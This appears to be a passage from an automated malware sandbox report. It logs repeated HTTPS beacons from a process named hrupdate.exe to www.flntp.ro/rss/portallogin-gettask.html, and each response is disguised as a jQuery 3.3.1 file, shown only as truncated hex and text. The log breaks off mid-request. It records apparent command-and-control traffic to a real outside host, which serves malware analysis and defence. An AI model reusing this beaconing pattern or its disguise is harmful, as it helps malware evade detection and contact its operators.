                                                              2024-12-19 21:40:59 UTC5671INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              23192.168.2.4497623.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:41:01 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:01 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:01 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5628
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:01 UTC5628INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              24192.168.2.4497693.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:41:03 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:04 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:03 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5692
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:04 UTC5692INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              25192.168.2.4497753.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:41:05 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:06 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:06 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5713
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:06 UTC5713INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              26192.168.2.4497813.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:41:07 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:08 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:08 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5671
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:08 UTC5671INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              27192.168.2.4497863.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:41:09 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:10 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:10 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5607
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:10 UTC5607INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              28192.168.2.4497923.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:41:12 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:12 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:12 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5649
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:12 UTC5649INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              29192.168.2.4497983.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:41:14 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:15 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:14 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5649
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:15 UTC5649INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              30192.168.2.4498043.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:41:16 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:17 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:17 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5671
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:17 UTC5671INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              31192.168.2.4498103.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:41:18 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:19 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:19 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5649
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:19 UTC5649INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              32192.168.2.4498153.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:41:20 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:21 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:21 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5713
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:21 UTC5713INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              33192.168.2.4498213.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:41:23 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
